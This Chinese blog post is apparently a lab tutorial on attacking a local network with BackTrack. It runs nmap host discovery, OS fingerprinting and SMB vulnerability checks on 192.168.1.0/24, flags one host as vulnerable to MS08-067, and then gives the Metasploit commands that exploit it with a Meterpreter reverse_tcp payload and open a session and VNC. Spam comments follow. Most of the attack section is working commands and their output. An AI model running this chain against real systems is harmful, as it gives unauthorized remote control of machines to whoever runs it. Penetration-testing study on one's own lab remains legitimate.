• 欢迎访问金笔头博客,这是一个菜鸟(伪)程序员的自留地,欢迎访问我的github:点击进入

[BackTrack]漏洞利用之metasploit实战

信息安全 eason 19969次浏览 14个评论 扫描二维码

1.扫描局域网内存活主机,将扫描结果存入ip.txt中

root@bt:~# nmap -sP 192.168.1.0/24 |grep ‘192.168.1.*’ >>/root/Desktop/ip.txt

ip.txt内容如下:

[BackTrack]漏洞利用之metasploit实战

整理一下格式:

[BackTrack]漏洞利用之metasploit实战

2.扫描存活主机的操作系统

root@bt:~# nmap -O -iL /root/Desktop/os.txt

Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-30 20:18 CST

Nmap scan report for localhost (192.168.1.11)

Host is up (0.023s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE

80/tcp   open  http

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1521/tcp open  oracle

2525/tcp open  ms-v-worlds

5560/tcp open  isqlplus

MAC Address: 00:F1:40:54:06:76 (Unknown)

Device type: general purpose

Running: Microsoft Windows XP

OS CPE: cpe:/o:microsoft:windows_xp::sp3:home

OS details: Microsoft Windows XP Home Edition SP3

Network Distance: 1 hop

 

Nmap scan report for localhost (192.168.1.13)

Host is up (0.00013s latency).

Not shown: 989 closed ports

PORT      STATE SERVICE

135/tcp   open  msrpc

139/tcp   open  netbios-ssn

443/tcp   open  https

445/tcp   open  microsoft-ds

903/tcp   open  iss-console-mgr

3306/tcp  open  mysql

5357/tcp  open  wsdapi

49152/tcp open  unknown

49153/tcp open  unknown

49154/tcp open  unknown

49155/tcp open  unknown

MAC Address: 74:E5:0B:99:6A:AA (Intel Corporate)

No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=6.01%E=4%D=7/30%OT=135%CT=1%CU=30640%PV=Y%DS=1%DC=D%G=Y%M=74E50B%

OS:TM=55BA1631%P=i686-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=102%TI=I%CI=I%II=I%

OS:SS=S%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST

OS:11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=200

OS:0%W6=2000)ECN(R=Y%DF=Y%T=41%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=41

OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=41%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R

OS:=Y%DF=Y%T=41%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=41%W=0%S=A%A=O%F=

OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=41%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T

OS:=41%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=41%W=0%S=Z%A=S+%F=AR%O=%RD=

OS:0%Q=)U1(R=Y%DF=N%T=41%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(

OS:R=Y%DFI=N%T=41%CD=Z)

 

Network Distance: 1 hop

 

Nmap scan report for localhost (192.168.1.19)

Host is up (0.0090s latency).

Not shown: 993 closed ports

PORT      STATE SERVICE

135/tcp   open  msrpc

139/tcp   open  netbios-ssn

445/tcp   open  microsoft-ds

49152/tcp open  unknown

49153/tcp open  unknown

49154/tcp open  unknown

49155/tcp open  unknown

MAC Address: 78:92:9C:8A:52:16 (Intel Corporate)

Device type: general purpose

Running: Microsoft Windows Vista

OS CPE: cpe:/o:microsoft:windows_vista

OS details: Microsoft Windows Vista

Network Distance: 1 hop

 

Nmap scan report for localhost (192.168.1.21)

Host is up (0.0054s latency).

Not shown: 996 filtered ports

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

5357/tcp open  wsdapi

MAC Address: 78:92:9C:89:9A:FC (Intel Corporate)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running (JUST GUESSING): Microsoft Windows Vista|2008|7 (97%)

OS CPE: cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7

Aggressive OS guesses: Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (97%), Microsoft Windows 7 Professional (95%), Microsoft Windows Vista SP2 or Windows Server 2008 (95%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP0 - SP1 (92%), Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 (91%), Microsoft Windows Vista Home Premium SP1 (89%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 SP2 (88%), Microsoft Windows 7 (87%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

 

Nmap scan report for localhost (192.168.1.22)

Host is up (0.000025s latency).

All 1000 scanned ports on localhost (192.168.1.22) are closed

Too many fingerprints match this host to give specific OS details

Network Distance: 0 hops

 

Nmap scan report for localhost (192.168.1.210)

Host is up (0.00038s latency).

Not shown: 995 closed ports

PORT     STATE SERVICE

23/tcp   open  telnet

80/tcp   open  http

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

1041/tcp open  danf-ak2

MAC Address: 00:0C:29:A1:60:82 (VMware)

Device type: general purpose

Running: Microsoft Windows XP

OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3

OS details: Microsoft Windows XP SP2 or SP3

Network Distance: 1 hop

 

Nmap scan report for localhost (192.168.1.250)

Host is up (0.0050s latency).

Not shown: 984 closed ports

PORT     STATE SERVICE

80/tcp   open  http

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

443/tcp  open  https

445/tcp  open  microsoft-ds

912/tcp  open  apex-mesh

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

1037/tcp open  ams

1041/tcp open  danf-ak2

1521/tcp open  oracle

2030/tcp open  device2

2401/tcp open  cvspserver

3306/tcp open  mysql

3389/tcp open  ms-wbt-server

7778/tcp open  interwise

MAC Address: 00:13:72:2E:88:83 (Dell)

Device type: general purpose

Running: Microsoft Windows 2000|XP|2003

OS CPE: cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::- cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2

OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2

Network Distance: 1 hop

 

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 7 IP addresses (7 hosts up) scanned in 42.31 seconds

root@bt:~#

 

 

3.批量扫描漏洞

root@bt:~# nmap -iL /root/Desktop/ip.txt --script=smb-check-vulns

Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-30 21:57 CST

Nmap scan report for localhost (192.168.1.8)

Host is up (0.0078s latency).

Not shown: 996 filtered ports

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

5357/tcp open  wsdapi

MAC Address: 78:92:9C:89:9A:FC (Intel Corporate)

 

Host script results:

| smb-check-vulns:

|   Conficker: UNKNOWN; got error No accounts left to try

|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

 

Nmap scan report for localhost (192.168.1.11)

Host is up (0.011s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE

80/tcp   open  http

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1521/tcp open  oracle

2525/tcp open  ms-v-worlds

5560/tcp open  isqlplus

MAC Address: 00:F1:40:54:06:76 (Unknown)

 

Host script results:

| smb-check-vulns:

|   MS08-067: NOT VULNERABLE

|   Conficker: Likely CLEAN

|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

 

Nmap scan report for localhost (192.168.1.13)

Host is up (0.000094s latency).

Not shown: 989 closed ports

PORT      STATE SERVICE

135/tcp   open  msrpc

139/tcp   open  netbios-ssn

443/tcp   open  https

445/tcp   open  microsoft-ds

903/tcp   open  iss-console-mgr

3306/tcp  open  mysql

5357/tcp  open  wsdapi

49152/tcp open  unknown

49153/tcp open  unknown

49154/tcp open  unknown

49155/tcp open  unknown

MAC Address: 74:E5:0B:99:6A:AA (Intel Corporate)

 

Host script results:

| smb-check-vulns:

|   Conficker: UNKNOWN; got error No accounts left to try

|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

 

Nmap scan report for localhost (192.168.1.19)

Host is up (0.021s latency).

Not shown: 993 closed ports

PORT      STATE SERVICE

135/tcp   open  msrpc

139/tcp   open  netbios-ssn

445/tcp   open  microsoft-ds

49152/tcp open  unknown

49153/tcp open  unknown

49154/tcp open  unknown

49155/tcp open  unknown

MAC Address: 78:92:9C:8A:52:16 (Intel Corporate)

 

Host script results:

| smb-check-vulns:

|   Conficker: UNKNOWN; got error No accounts left to try

|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

 

Nmap scan report for localhost (192.168.1.22)

Host is up (0.0000070s latency).

All 1000 scanned ports on localhost (192.168.1.22) are closed

 

Nmap scan report for localhost (192.168.1.210)

Host is up (0.00090s latency).

Not shown: 995 closed ports

PORT     STATE SERVICE

23/tcp   open  telnet

80/tcp   open  http

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

1041/tcp open  danf-ak2

MAC Address: 00:0C:29:A1:60:82 (VMware)

 

Host script results:

| smb-check-vulns:

|   MS08-067: NOT VULNERABLE

|   Conficker: Likely CLEAN

|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

 

Nmap scan report for localhost (192.168.1.250)

Host is up (0.025s latency).

Not shown: 984 closed ports

PORT     STATE SERVICE

80/tcp   open  http

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

443/tcp  open  https

445/tcp  open  microsoft-ds

912/tcp  open  apex-mesh

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

1037/tcp open  ams

1041/tcp open  danf-ak2

1521/tcp open  oracle

2030/tcp open  device2

2401/tcp open  cvspserver

3306/tcp open  mysql

3389/tcp open  ms-wbt-server

7778/tcp open  interwise

MAC Address: 00:13:72:2E:88:83 (Dell)

 

Host script results:

| smb-check-vulns:

|   MS08-067: VULNERABLE  <strong>发现有个漏洞可以利用</strong>

|   Conficker: Likely CLEAN

|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

 

Nmap done: 7 IP addresses (7 hosts up) scanned in 20.17 seconds

root@bt:~#

 

 

4.用metasploit进行溢出,获得系统的最高权限。

在backtrack系统的shell下输入msfcosole打开metasploit

root@bt:~# msfconsole

[BackTrack]漏洞利用之metasploit实战

搜索ms08_067这个漏洞的exp

[BackTrack]漏洞利用之metasploit实战

使用use加载这个ms08_067攻击模板

msf > use exploit/windows/smb/ms08_067_netapi

设置相应的payload,即shellcode

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

[BackTrack]漏洞利用之metasploit实战

设置参数

[BackTrack]漏洞利用之metasploit实战

RHOST   即目标机的IP地址

LOPRT   即reverse_tcp 反弹回来的端口,如果有其他什么的阻止的时候就可以用这个来设置。

LHOST   即自己这台机的IP

 

检查设置好的参数,确保无误

msf  exploit(ms08_067_netapi) > show options

确认无误之后进行溢出

msf  exploit(ms08_067_netapi) > exploit –j

[BackTrack]漏洞利用之metasploit实战

溢出完成后,查看可连接的session

msf  exploit(ms08_067_netapi) > sessions –l

[BackTrack]漏洞利用之metasploit实战

连接session 1

msf  exploit(ms08_067_netapi) > sessions -i 1

[BackTrack]漏洞利用之metasploit实战

运行vnc连接

[BackTrack]漏洞利用之metasploit实战

[BackTrack]漏洞利用之metasploit实战

[player autoplay=”1″]


金笔头博客, 版权所有丨如未注明 , 均为原创, 转载请注明[BackTrack]漏洞利用之metasploit实战
喜欢 (2)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(14)个小伙伴在吐槽
  1. Thanks-a-mundo for the post.Really thank you! Much obliged.
    ottoman coffee table2016-02-10 18:34 Reply Windows XP | Opera 9.64
  2. wow, awesome blog article.Much thanks again. Really Great.
    amateur porno2016-02-03 12:05 Reply Windows 7 | Firefox 3.5.3
  3. I simply want to say I'm new to blogs and certainly enjoyed your page. More than likely I’m likely to bookmark your blog post . You really have remarkable article content. Regards for sharing with us your blog.
    you could look here2016-01-26 03:37 Reply Windows XP | Internet Explorer 7.0
  4. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I've been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.
    • you can search the plugin named "wp-connect"
      wangyisheng2016-01-24 19:19 Reply Windows 7 | Chrome 47.0.2526.106
  5. hola amigos, funcionan los comentarios?
    Andrew2016-01-07 02:37 Reply Windows XP | Opera 8.50
  6. Hi, Neat post. There is a problem together with your website in web explorer, may check this? IE still is the market leader and a huge portion of other people will pass over your excellent writing due to this problem.
    parajumpers mens coats london2015-12-27 01:47 Reply Windows 7 | 未知浏览器
  7. I'm extremely impressed with your writing skills as well as with the layout on your weblog. Is this a paid theme or did you modify it yourself? Anyway keep up the excellent quality writing, it is rare to see a great blog like this one today.
    ugg pas cher eu2015-12-26 23:09 Reply Windows 7 | 未知浏览器
    • it's a free theme and i modified slightly :mrgreen:
      wangyisheng2015-12-28 17:14 Reply Windows 7 | Chrome 47.0.2526.106
  8. Hmm it seems like your blog ate my first comment (it was extremely long) so I guess I'll just sum it up what I had written and say, I'm thoroughly enjoying your blog. I too am an aspiring blog writer but I'm still new to the whole thing. Do you have any tips for beginner blog writers? I'd really appreciate it.
    moncler dylan traduction2015-12-15 20:15 Reply Windows 7 | 未知浏览器
    • i am new too,i just write what i am learning :razz:
      wangyisheng2015-12-15 22:04 Reply Windows 7 | Chrome 45.0.2454.101
  9. Good replies in return of this matter with real arguments and telling the whole thing concerning that.
    nike air force uomo2015-12-12 01:18 Reply Windows 7 | 未知浏览器
  10. It's amazing in favor of me to have a web site, which is helpful designed for my know-how. thanks admin
    nike air max classics kopen2015-12-07 18:31 Reply Windows 7 | 未知浏览器
    • you are welcome
      wangyisheng2015-12-07 19:02 Reply Windows 7 | Chrome 45.0.2454.101